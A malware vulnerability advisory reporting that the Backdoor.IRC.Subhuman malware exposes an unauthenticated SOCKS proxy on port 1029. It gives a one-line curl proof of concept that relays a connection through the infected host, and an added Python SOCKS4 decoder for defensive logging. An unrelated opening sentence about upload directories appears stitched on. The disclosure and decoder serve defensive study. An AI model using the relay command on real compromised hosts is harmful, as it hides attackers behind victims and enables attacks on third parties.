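For the upload case the containment check is necessary but not sufficient on its own: an upload directory that the web server will execute scripts from still turns a contained upload into code execution, so the directory should also be outside the document root or served with script execution disabled.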
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/f93e64ac9c3383d0df23662a78a76c07.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.IRC.Subhuman<br />Vulnerability: Unauthenticated Open Proxy<br />Description: The malware listens on TCP port 1029. Third-party attackers who can connect to the infected system can relay requests from the original connection to the destination and then back to the origination system. Attackers may then be able to launch attacks, download files or port scan third party systems and it will appear as the attacks originated from that infected host.<br />Type: PE32<br />MD5: f93e64ac9c3383d0df23662a78a76c07<br />Vuln ID: MVID-2021-0418<br />Disclosure: 12/11/2021<br /><br />Exploit/PoC:<br />curl socks4://192.168.18.125:1029 http://192.168.18.128:21<br />220 INetSim FTP Service ready.<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
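The PoC's curl command speaks SOCKS4 to the listener, which then opens the FTP connection on the caller's behalf; the 220 banner coming back is the proof that the relay worked. The following is an added example, not Malvuln's code: decoders for the SOCKS4 request and reply that exchange would produce, extended to the SOCKS4a hostname form, plus a one-line summary a defender can log when traffic to such a port is observed. The byte strings are constructed to match what the PoC's curl command would send, with an empty USERID.

```python
import ipaddress
import struct
from typing import Optional

# Added example, not Malvuln's code: decoders for the SOCKS4 request and reply
# that the PoC's curl command would exchange with the listener on port 1029, plus
# a one-line relay summary a defender can emit when traffic to that port is seen.
# The byte strings are constructed; SOCKS4a hostnames are handled as well.

SOCKS4_COMMANDS = {1: "CONNECT", 2: "BIND"}
SOCKS4_REPLIES = {0x5A: "granted", 0x5B: "rejected",
                  0x5C: "identd unreachable", 0x5D: "identd mismatch"}


def parse_socks4_request(data: bytes) -> dict:
    """VN(1) CD(1) DSTPORT(2) DSTIP(4) USERID... NUL [HOSTNAME... NUL for SOCKS4a]."""
    if len(data) < 9:
        raise ValueError("too short for a SOCKS4 request")
    vn, cd, dst_port = struct.unpack_from("!BBH", data, 0)
    if vn != 4:
        raise ValueError(f"not SOCKS4 (version byte {vn})")
    dst_ip = ipaddress.IPv4Address(data[4:8])
    nul = data.find(b"\x00", 8)
    if nul == -1:
        raise ValueError("USERID is not NUL-terminated")
    hostname = None
    # SOCKS4a: a DSTIP of 0.0.0.x (x != 0) means a hostname follows the USERID.
    if dst_ip.packed[:3] == b"\x00\x00\x00" and dst_ip.packed[3] != 0:
        end = data.find(b"\x00", nul + 1)
        if end == -1:
            raise ValueError("SOCKS4a hostname is not NUL-terminated")
        hostname = data[nul + 1:end].decode("ascii", "replace")
    return {
        "command": SOCKS4_COMMANDS.get(cd, f"unknown({cd})"),
        "dst_ip": str(dst_ip),
        "dst_port": dst_port,
        "userid": data[8:nul].decode("ascii", "replace"),
        "hostname": hostname,
    }


def parse_socks4_reply(data: bytes) -> dict:
    """VN(1, always 0) CD(1) DSTPORT(2) DSTIP(4)."""
    if len(data) < 8:
        raise ValueError("too short for a SOCKS4 reply")
    vn, cd, dst_port = struct.unpack_from("!BBH", data, 0)
    if vn != 0:
        raise ValueError(f"bad SOCKS4 reply version byte {vn}")
    return {"status": SOCKS4_REPLIES.get(cd, f"unknown({cd})"), "granted": cd == 0x5A,
            "dst_ip": str(ipaddress.IPv4Address(data[4:8])), "dst_port": dst_port}


def relay_summary(request: bytes, reply: bytes) -> Optional[str]:
    """A log line when the listener agreed to relay, else None."""
    req = parse_socks4_request(request)
    rep = parse_socks4_reply(reply)
    if not rep["granted"]:
        return None
    target = req["hostname"] or req["dst_ip"]
    return f"open proxy relayed {req['command']} to {target}:{req['dst_port']} (userid={req['userid']!r})"


# Constructed: what 'curl socks4://192.168.18.125:1029 http://192.168.18.128:21' sends
# (CONNECT to 192.168.18.128:21, empty USERID) and a 'request granted' reply.
REQUEST = b"\x04\x01\x00\x15\xc0\xa8\x12\x80\x00"
REPLY = b"\x00\x5a\x00\x15\xc0\xa8\x12\x80"
# Constructed SOCKS4a form of the same request, carrying a hostname instead of an address.
REQUEST_4A = b"\x04\x01\x00\x15\x00\x00\x00\x01\x00" + b"ftp.internal.example\x00"

if __name__ == "__main__":
    print(relay_summary(REQUEST, REPLY))
    print(parse_socks4_request(REQUEST_4A))
```

The request's first bytes (version 4, command 1, then a port and address) make a compact network signature: a host that answers such a request on an unexpected port with 0x00 0x5A has accepted a relay, and the infected host, not the real client, will appear as the source of whatever follows.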